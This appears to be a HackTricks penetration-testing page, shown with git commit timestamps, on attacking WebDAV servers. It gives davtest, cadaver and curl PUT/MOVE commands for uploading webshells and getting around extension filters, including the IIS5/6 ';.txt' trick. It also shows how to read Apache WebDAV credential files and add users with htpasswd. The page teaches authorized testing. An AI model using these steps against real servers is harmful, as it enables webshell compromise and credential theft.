hacktricks/pentesting/pentesting-web/put-method-webdav.md

94 lines
3.7 KiB
Markdown
Raw Normal View History

# WebDav
2021-11-30 16:46:07 +00:00
A **HTTP Server with WebDav** active is a server where you probably can **update, delete, move, copy** files. **Sometimes** you **need** to have **valid credentials** (usually check with HTTP Basic Authentication).
2021-11-30 16:46:07 +00:00
You should try to **upload** some **webshell** and **execute** it from the web server to take control over the server.\
2022-01-31 14:51:03 +00:00
Usually, to **connect** a WebDav server you will need valid **credentials**: [**WebDav bruteforce**](../../brute-force.md#http-basic-auth) _(Basic Auth)_.
Other common configuration is to **forbid uploading** files with **extensions** that will be **executed** by the web server, you should check how to **bypass this:**
* **Upload** files with **executable extensions** (maybe it's not forbidden).
2021-11-30 16:46:07 +00:00
* **Upload** files **without executable extensions** (like .txt) and try to **rename** the file (move) with an **executable extension**.
* **Upload** files **without executable extensions** (like .txt) and try to **copy** the file (move) with **executable extension.**
## DavTest
2021-11-30 16:46:07 +00:00
**Davtest** try to **upload several files with different extensions** and **check** if the extension is **executed**:
```bash
davtest [-auth user:password] -move -sendbd auto -url http://<IP> #Uplaod .txt files and try to move it to other extensions
davtest [-auth user:password] -sendbd auto -url http://<IP> #Try to upload every extension
```
Output sample:
![](<../../.gitbook/assets/image (19).png>)
2021-11-30 16:46:07 +00:00
This doesn't mean that **.txt** and **.html extensions are being executed**. This mean that you can **access this files** through the web.
## Cadaver
2021-11-30 16:46:07 +00:00
You can use this tool to **connect to the WebDav** server and perform actions (like **upload**, **move** or **delete**) **manually**.
```
cadaver <IP>
```
## PUT request
```
curl -T 'shell.txt' 'http://$ip'
```
## MOVE request
```
curl -X MOVE --header 'Destination:http://$ip/shell.php' 'http://$ip/shell.txt'
```
## IIS5/6 WebDav Vulnerability
2021-11-30 16:46:07 +00:00
This vulnerability is very interesting. The **WebDav** does **not allow** to **upload** or **rename** files with the extension **.asp**. But you can **bypass** this **adding** at the end of the name **";.txt"** and the file will be **executed** as if it were a .asp file (you could also **use ".html" instead of ".txt"** but **DON'T forget the ";"**).
2021-11-30 16:46:07 +00:00
Then you can **upload** your shell as a ".**txt" file** and **copy/move it to a ".asp;.txt"** file. An accessing that file through the web server, it will be **executed** (cadaver will said that the move action didn't work, but it did).
![](<../../.gitbook/assets/image (18).png>)
## Post credentials
If the Webdav was using an Apache server you should look at configured sites in Apache. Commonly:\
_**/etc/apache2/sites-enabled/000-default**_
Inside it you could find something like:
```
ServerAdmin webmaster@localhost
Alias /webdav /var/www/webdav
<Directory /var/www/webdav>
DAV On
AuthType Digest
AuthName "webdav"
AuthUserFile /etc/apache2/users.password
Require valid-user
```
2022-04-05 22:24:52 +00:00
As you can see there is the files with the valid **credentials** for the **webdav** server:
```
/etc/apache2/users.password
```
2021-11-30 16:46:07 +00:00
Inside this type of files you will find the **username** and a **hash** of the password. These are the credentials the webdav server is using to authenticate users.
2021-11-30 16:46:07 +00:00
You can try to **crack** them, or to **add more** if for some reason you wan to **access** the **webdav** server:
```bash
htpasswd /etc/apache2/users.password <USERNAME> #You will be prompted for the password
```
To check if the new credentials are working you can do:
```bash
wget --user <USERNAME> --ask-password http://domain/path/to/webdav/ -O - -q
```